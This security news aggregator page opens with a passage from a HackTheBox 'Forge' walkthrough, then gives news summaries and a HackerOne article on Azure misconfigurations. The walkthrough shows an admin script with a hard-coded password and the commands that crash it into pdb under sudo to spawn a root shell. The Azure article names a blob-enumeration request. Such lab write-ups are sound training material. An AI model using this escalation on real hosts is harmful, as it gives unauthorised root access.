will drop to an interactive debugging session? For answering this task let’s analyze the python code present inside /opt/remote-manage.py. #!/usr/bin/env python3 import socket import random import subprocess import pdb port = random.randint(1025, 65535) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((''127.0.0.1'', port)) sock.listen(1) print(f''Listening on localhost:{port}'') (clientsock, addr) = sock.accept() clientsock.send(b''Enter the secret passsword: '') if clientsock.recv(1024).strip().decode() != ''secretadminpassword'': clientsock.send(b''Wrong password!\n'') else: clientsock.send(b''Welcome admin!\n'') while True: clientsock.send(b''\nWhat do you wanna do: \n'') clientsock.send(b''[1] View processes\n'') clientsock.send(b''[2] View free memory\n'') clientsock.send(b''[3] View listening sockets\n'') clientsock.send(b''[4] Quit\n'') option = int(clientsock.recv(1024).strip()) if option == 1: clientsock.send(subprocess.getoutput(''ps aux'').encode()) elif option == 2: clientsock.send(subprocess.getoutput(''df'').encode()) elif option == 3: clientsock.send(subprocess.getoutput(''ss -lnt'').encode()) elif option == 4: clientsock.send(b''Bye\n'') break except Exception as e: print(e) pdb.post_mortem(e.__traceback__) finally: quit() What the code does: This Python script sets up a local TCP server on a random port that prompts a connected client for a password and provides a menu-driven interface to execute system commands like viewing processes, free memory, listening sockets, and quitting. Important parts of the code: The key components are the socket setup for TCP communication (socket.socket and sock.listen), the password validation logic, the use of subprocess.getoutput to execute system commands based on user input, and error handling with pdb.post_mortem. Interactive debugging module: The imported Python module for interactive debugging is pdb. Answer: pdb Let’s do make a note of password from the python script which seems to be secretadminpassword Task 11: Submit the flag located in the root user’s home directory. For this task we will be needing two terminals one for running the script and another to connecting back and running the debugger. Let’s make sure before we proceed we have another terminal opened up with ssh connection to the same host using the command ssh user@10.129.187.4 -i id_rsa. On your first terminal run the program with sudo permissions using the following command. user@forge:~$ sudo python3 /opt/remote-manage.py Listening on localhost:56863 Now in another terminal which has second ssh connection, start your netcat listener to the same port, enter your password. user@forge:~$ nc localhost 56863 Enter the secret passsword: secretadminpassword Welcome admin! Now it will prompt you 4 options, you have to type in any non numeric character to trigger the pdb debugger. In my example I have typed in abcd. user@forge:~$ nc localhost 56863 Enter the secret passsword: secretadminpassword Welcome admin! What do you wanna do: [1] View processes [2] View free memory [3] View listening sockets [4] Quit abcd Now switch back to first terminal and you should see pdb must be enabled now type in the following command to elevate the privilges. (Pdb) import os; os.system(''/bin/bash''); root@forge:/home/user# Now it’s time to get the root flag and we have solved this machine. root@forge:/home/user# cat /root/root.txt

by HACKLIDO

Krispy Kreme, the doughnut giant, revealed on Wednesday that its online ordering systems in the US had been hit by a cyberattack. In a regulatory filing, Krispy Kreme disclosed that upon discovering an intruder in their systems on November 29th, they promptly initiated measures to secure their networks with the assistance of cybersecurity specialists. Since […] The post Do(ug)h! Krispy Kreme Suffers Cyberattack appeared first on IT Security Guru.

by IT Security Guru

We went hands-on with Keeper''s password manager, and found that it takes security seriously, using leading encryption technology to protect your sensitive data.

by ZDNET Security

A new report makes it clear that U.K. organizations need to do more security awareness training to ensure their employees don’t fall victim to the evolving use of AI.

by KnowBe4

A widespread phishing campaign is attempting to steal credentials from employees working at dozens of organizations around the world, according to researchers at Group-IB.

by KnowBe4

Iran-affiliated threat actors have been linked to a new custom malware that''s geared toward IoT and operational technology (OT) environments in Israel and the United States. The malware has been codenamed IOCONTROL by OT cybersecurity company Claroty, highlighting its ability to attack IoT and supervisory control and data acquisition (SCADA) devices such as IP cameras, routers, programmable

by The Hacker News

Run by the team at orchestration, AI, and automation platform Tines, the Tines library contains pre-built workflows shared by real security practitioners from across the community, all of which are free to import and deploy via the Community Edition of the platform.  Their bi-annual “You Did What with Tines?!” competition highlights some of the most interesting workflows submitted by their

by The Hacker News

Looking for a router that can provide full VPN coverage at home? These are the best routers that support VPN installation or include pre-installed VPNs.

by ZDNET Security

Care1, a Canadian healthcare solutions provider left a cloud storage instance freely accessible and unencrypted for anyone to find.

by Malwarebytes Labs

Small, easily weaponizable drones have become a feature of battlefields from the Middle East to Ukraine. Now the threat looms over the US homeland—and the Pentagon''s ability to respond is limited.

by WIRED Security News

As the adoption of LCNC grows, so will the complexity of the threats organizations face.

by Dark Reading

Implementing Privacy by Design principles in decentralized identity systems helps safeguard user data, comply with regulations, and build trust in digital ecosystems centered on privacy.

by ITPro Today

Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection. ""PUMAKIT is a sophisticated loadable kernel module (LKM) rootkit that employs advanced stealth mechanisms to hide its presence and maintain communication with

by The Hacker News

The market of embedded computing has been growing constantly, and this trend is expected to continue in the near future. Notably, embedded systems are key components for the Internet of Things (IoT) and for Cyber Physical Systems (CPSs). In the embedded software industry, secure software development is critical. This is especially true because embedded software often involves vital industries, such as medical devices or automotive solutions.  When we’re talking about medical emergencies or transport, software failures can literally become a matter of life and death. Additionally, the growing complexity of embedded software can come with security costs if you don’t apply the right testing procedures. Software development models, such as the V-Model, play a crucial role in ensuring software quality and security.  This blog will explain how fuzz testing can optimize testing efficiency within the V-model methodology. It will dive into the principles of fuzz testing and its impact at different stages of the V-model testing process. Contents What is V-model testing? V-model testing and embedded software: the testing stages How does fuzz testing help in each testing stage? Discover Code Intelligence and Fuzz Testing

by Code Intelligence

December is a month of numbers, from holiday countdowns to RSVPs for parties. But for business leaders, the most important numbers this month are the budget numbers for 2025. With cybersecurity a top focus for many businesses in 2025, it is likely to be a top-line item on many budgets heading into the New Year. […] The post Making smart cybersecurity spending decisions in 2025 appeared first on Security Intelligence.

by Security Intelligence

AI risks arise not from AI acting on its own, but because of what people do with it.

by WIRED Security News

Azure Cloud Configuration Review Paul De Baldo V Fri, 12/13/2024 - 10:44 Body Testing MethodologiesHackerOne’s Microsoft Azure testing methodologies are grounded in the principles of the PTES, CIS Microsoft Azure Benchmarks, and the Azure Well-Architected Framework Pillar. Additionally, our testing processes adhere to the standards required for CREST certification/accreditation, ensuring comprehensive and reliable assessments across various cloud environments, including Microsoft Azure. Organizations can now better protect against risk and attacks with highly skilled experts with specialized, proven expertise in vulnerabilities specific to the products and services in your Azure cloud environment.Common VulnerabilitiesMicrosoft Azure operates with a Shared Responsibility Model that outlines the division of security responsibilities between Microsoft and its customers. The division of areas of responsibility vary based on the deployment type: Software as a Service (SaaS), Platform as a Service (Paas), and Infrastructure as a Service (IaaS). Though, with any deployment, customers are responsible for the security of their data, devices, and accounts. With the vast number of potential combinations of Azure services and their configurations, it can be easy to overlook vulnerabilities that can arise from misconfigurations.Entra ID MisconfigurationsEntra ID, (formally known as Azure Active Directory) is the Identity and Access Management (IAM) service for Microsoft’s cloud environments. Users in Entra ID can be both internal and external to your organization. If audits are not regularly performed, guest credentials could exist past their time of necessity, which is a possible entry point for compromise. Furthermore, additional IAM misconfigurations can occur.Outside of the cloud, local Active Directory (AD) runs on servers known as Domain Controllers (DC). Each DC contains a list of entities that are authorized to access network resources. In order to authenticate, users use the Kerberos or NTLM protocols.Your self-hosted AD can be synchronized to this cloud variant using Entra Connect Sync. This on-premise and cloud combination is referred to as a hybrid. If your organization uses a hybrid authentication model using the pass-through or federated methods, any publicly exposed passwords are reported but only if the password hash synchronization feature is explicitly enabled.Multi-factor authentication (MFA) must also be enabled, as the default configuration settings do not enforce it. This should be applied to the Service Management API and all user accounts.Additionally, there are two group types within Entra ID: Security and M365. The creation of these groups should be restricted to administrators only. By creating groups, you can organize users within your cloud environment by department and give them access to shared resources. By default when an M365 group is created, it is set to public. This public state can lead to users sharing sensitive information with a wider audience than intended. It is vital to secure connected IAM systems in both Azure and on premise systems to prevent attackers from exploiting a misconfiguration to pivot from one IAM system to the other. Security is only as strong as the weakest link.Microsoft RBAC MisconfigurationsManaging who has access to Azure resources, what actions can be taken against them, and what areas of the cloud can be accessed is achieved through Role Based Access Control (RBAC). By assigning a role to a user, user group, or service – fine-grained access control measures can be implemented. Role assignments consist of three elements: a security principle, role definition, and scope. The security principle identifies the entity that a collection of permissions referred to as a role definition applies to. Once a role definition is assigned to a security principle, a scope can be applied that defines the resources and services that are allowed to be accessed.While several built-in roles are provided, misconfigurations can arise when creating custom roles. For example, the use of wildcard characters (*) grants access to all available actions that can be executed on a resource. In the absence of supplied NotActions that explicitly specify actions that cannot be performed, wildcard characters can lead to unauthorized access to sensitive data and functionality.Virtual Network MisconfigurationsVirtual Networks provide the means to partition hosts belonging to your organization through subnetting. To ensure members of your organization only have access to the portions of the network that are required to perform their duties, network security groups with stringent rules need to be implemented. The creation of these groups should be restricted to administrators only.Misconfigurations in security group rules can lead to unauthorized access to hosts and services. The rules are built using multiple parameters, including: the originating source, destination source, protocol, traffic direction, port or port range, and priority level. Even if rules are established, the vast number of possible combinations of these parameters can lead to access oversight.Additionally, rules are processed in a set priority order. As soon as traffic matches a priority level, processing stops. This means the intended rule may not be enforced if its priority ranking is misconfigured.Modifications of rules or the complete removal of them only apply to subsequent connections. Any existing connections are not reevaluated. This can also lead to unauthorized access if users who do not meet the updated criteria had prior access to the resource. Misconfigurations in routing tables and forced tunneling settings can also lead to unapproved network access. Attackers can exploit these misconfigurations to access any Azure resource on that network segment.App Service MisconfigurationsAzure App Service is a Platform-as-a-Service (PaaS) for building, deploying, and scaling web applications and APIs.Authentication to this service is disabled by default on new web applications, allowing anonymous access. Once enabled, this feature enforces authentication on all HTTP requests before they reach the application code. Because anonymous access by default is insecure, additional configuration hardening is required.Azure Function Apps default to public access but can be restricted to Azure Virtual Networks (VNets) for enhanced security. Unless absolutely necessary, public access should be limited using private endpoints to prevent unauthorized access. Functions should use access keys and not be configured using accounts with administrative privileges. It is vital to restrict and harden access in accordance with the Principle of Least Privilege.Azure Web Apps support both HTTP and HTTPS protocols, with HTTP access being allowed by default. All traffic should be redirected to use the secure variant of the protocol to provide secure encrypted communication.Advisor MisconfigurationsThe Azure Advisor service provides detailed, actionable recommendations that can improve the security of your organization’s cloud environment. By default, all recommendations are enabled. However, with the appropriate permission levels, configurations can be made in order to exclude recommendations based on subscriptions or resources. Recommendations can also be postponed or dismissed on a single resource. If recommendations are dismissed, they will not be seen again unless manually reactivated. Forgotten recommendations that were dismissed or disabled entirely can lead to a lack of awareness regarding critical security issues, leaving your environment vulnerable to exploitation.Activity Log MisconfigurationsMicrosoft’s Azure Monitor collects and aggregates data from every area and resource across your Azure environment. The Activity Log maintains an audit trail of activity events taken within the environment that is crucial for threat monitoring and incident response processes. It is vital to ensure that alerts for critical events such as “Delete PostgreSQL Database” are enabled to provide immediate awareness of significant changes to your environment. Virtual Machine MisconfigurationsVirtual Machines (VMs) are scalable computing resources provided by Microsoft that allows users to run applications and workloads in the Azure cloud.Misconfigured rules such as “install approved extensions only” and  “enable automatic OS upgrades” can lead to vulnerabilities. Since extensions run with administrator privileges, the use of vulnerable extensions can result in privilege escalation and remote execution attacks. Also, outdated operating systems can contain known vulnerabilities just awaiting exploitation. Additionally, VMs should be configured to use managed disk volumes encrypted with a managed key. This also applies to unattached disks in the subscription.Blob Storage MisconfigurationsMicrosoft Azure offers various different storage services. The Blob Storage service is able to hold massive amounts of unstructured data such as text and binary data in a network of remote servers. By default, any files uploaded to the cloud are set to private. However, improper access configurations can lead to unauthorized access to sensitive data.In Azure, unique namespaces for your data are known as storage accounts. Within these accounts, blob files are organized in containers, similar to how files are stored in directories. Each blob can be accessed via a URL that all share the same format of: https://[storage-account].blob.core.windows.net/[container-name]/[blob-name]Since the storage account name is the only dynamic part of the URL, any containers that are unintentionally set to the “Public read access for container and its blobs” access level, can be easily enumerated and their contents can be read.A dictionary attack would not be very effective in enumerating file names unless they were generically named. However, a List Blobs API call can be issued, that is a GET request to https://[storage-account].blob.core.windows.net/[container-name]?restype=container&comp=list to enumerate the blobs in a publicly accessible container. If these containers were supposed to be protected, this can lead to unauthorized access to critical data.Additionally, vulnerabilities can arise in the absence of the “enable immutable blob storage” rule, which allows users to store critical data in a state that disables the modification and deletion of data for a specified amount of time.Azure Database Service MisconfigurationsAzure offers a number of different database options for data storage in the cloud. Encryption both at rest as well as in transit is vital to ensuring sensitive data is not accessed or intercepted by unauthorized third parties. Robust auditing and logging measures are also a critical aspect to allow your organization to quickly identify and respond to potential data theft.As a best practice, separate accounts should be used for database access. This limits the potential threat an account could pose in the event it is compromised. The principle of least privilege and a zero trust security model should be foundations when addressing who has access to your organization''s database services. By taking a defense-in-depth approach in regard to database security, you can iteratively harden against data breaches through the use of firewalls at differing levels, access management policies, encryption, regular auditing, and threat detection tooling.Azure Key Vault MisconfigurationsThe secure storage and accessibility of secrets within your Azure environment can be accomplished using Azure Key Vault.Proper key vault-specific RBAC implementations and the delineation of key vaults are vital to limiting secret access to only those who have the required permission levels and need to access them. Any user accounts that do meet these requirements should have MFA enabled as their privileged roles pose a greater risk to an organization should they be compromised. Data could be permanently lost if a threat actor were to gain access to one of these accounts in the absence of soft-delete and purge protection configurations.Automatic key rotation should be enabled in your organization''s key policy. This rotation type will automatically renew a key at configured intervals which mitigates against access to secrets by members who may have had their access revoked or no longer belong to your organization.Key vaults should be configured to only allow connections through private endpoints. Misconfigurations can increase your organization''s attack surface by facing the vaults publicly. Additionally, it is crucial to enable logging on key vaults in order to assess for suspicious access and activate response processes.Azure Defender MisconfigurationsDefender is a cloud-native application protection platform (CNAPP) that provides a suite of security measures and practices. Designed to improve your organization''s security posture, Defender assists in identifying vulnerabilities across your entire attack surface.Defender should be enabled for all of your organization''s resources and services, including those on-premise as well as on different cloud providers. This security tool is able to provide a comprehensive level of hardening to your assets, but only if it is aware of them to begin with. Defender will provide security recommendations in order to remediate security gaps that it identifies. For example, Defender will alert you of any software updates that should be applied to virtual machines. Misconfigured exemptions to handle these suggestions can result in assets being left in a vulnerable state.Azure Configuration Review Best PracticesCareful ScopingHaving the right scope is crucial to a successful pentest—what is being tested can be just as important as how it is being tested. An Azure environment can be vast, with various resources and services distributed throughout.By strategically selecting targets within your cloud environment, you can ensure quality time is dedicated to your most critical cloud assets. This curation can mean the difference between an inconsequential configuration review and a valuable review that discovers high-impact vulnerabilities. HackerOne assesses your assets to provide guidance on which ones to include and delivers a quote tailored to your specific requirements.Skills-Based Tester MatchingTraditional consultancies often rely on in-house pentesters with general skills. However, Azure pentesting requires specialized knowledge of the environment and cloud security practices.With HackerOne Pentest, delivered via a Pentest as a Service (PTaaS) model, customers gain access to a diverse pool of elite, vetted security researchers who bring a wide range of skills, certifications, and experience specific to Microsoft Azure. The HackerOne platform keeps track of each researcher''s skill set based on their track record and matches the most suitable researchers for each engagement. The community-driven PTaaS approach delivers comprehensive coverage, versatility, and the highest-quality results tailored to the services of your Azure environments.Case Study: Microsoft’s Own MisconfigurationIn October of 2022, Microsoft confirmed that an Azure Blob Storage that contained 2.4 terabytes of sensitive data was left exposed due to a misconfiguration. Over 300,000 emails, 133,000 projects, and the information of 548,000 users belonging to 65,000 companies were publicly accessible. Included in this data were items such as invoices, intellectual property, and internal comments.  Source: Misconfigured Server Storage discovered by SOCRadar Cloud Security Module The misconfigured bucket was maintained and owned by Microsoft themselves and the company only became aware of the issue after being notified of the vulnerability by threat intelligence provider SOCRadar. After receiving the notification, the technology giant resolved the issue by reconfiguring the storage bucket to a private state. Although there was no indication of unauthorized access, it was just a matter of luck that threat actors did not notice and access this misconfigured bucket first.Why HackerOne PTaaS Is the Best Option for Azure Cloud ReviewBy choosing HackerOne as your partner in pentesting, your organization can fully benefit from the community-driven pentest-as-a-service (PTaaS) model that provides unmatched expertise and resources for Azure Security Configuration pentests. The HackerOne platform streamlines the entire pentest process to deliver the greatest return on investment in risk reduction.By leveraging the people and the technology, your organization gains the following advantages:Comprehensive Azure Security Configuration Reviews: Access pentesters with deep expertise in auditing and improving Azure cloud configurations to secure your cloud infrastructure against vulnerabilities.Efficient Program Initiation: Experience rapid program setup with direct communication channels to testers, ensuring on-demand delivery of findings.Streamlined Pentest Management: Utilize the HackerOne Platform for pentest management, including a bi-directional Azure DevOps integration to align development and security teams, reducing manual back-and-forth communication. The result is a streamlined security vulnerability remediation workflow.Extended Attack Surface Coverage: Our diverse community of security researchers excels in uncovering misconfigurations and vulnerabilities unique to Azure environments, enabling comprehensive security audits without the need to switch vendors.Contact the HackerOne team today to get started! Excerpt Learn the testing methodologies and security best practices for Azure Cloud Configuration Review. Main Image

by HackerOne

by ComputerWeekly

Consider critical capabilities of MDR solutions such as comprehensive protection across various platforms, seamless integration of existing technology and more.

by ReliaQuest

The U.S. Department of Justice (DoJ) on Thursday announced the shutdown of an illicit marketplace called Rydox (""rydox[.]ru"" and ""rydox[.]cc"") for selling stolen personal information, access devices, and other tools for conducting cybercrime and fraud. In tandem, three Kosovo nationals and administrators of the service, Ardit Kutleshi, Jetmir Kutleshi, and Shpend Sokoli, have been arrested.

by The Hacker News

Cross-site request forgery, or CSRF, is a type of cybersecurity attack where a logged-in victim is tricked into an unwanted action by a malicious attacker.

by ThreatDown

SophosAI’s framework for upgrading the performance of LLMs for cybersecurity tasks (or any other specific task) is now open source.

by Sophos News

Introduction OilRig: Unveiling the Advanced Tactics of APT34

by Picus Security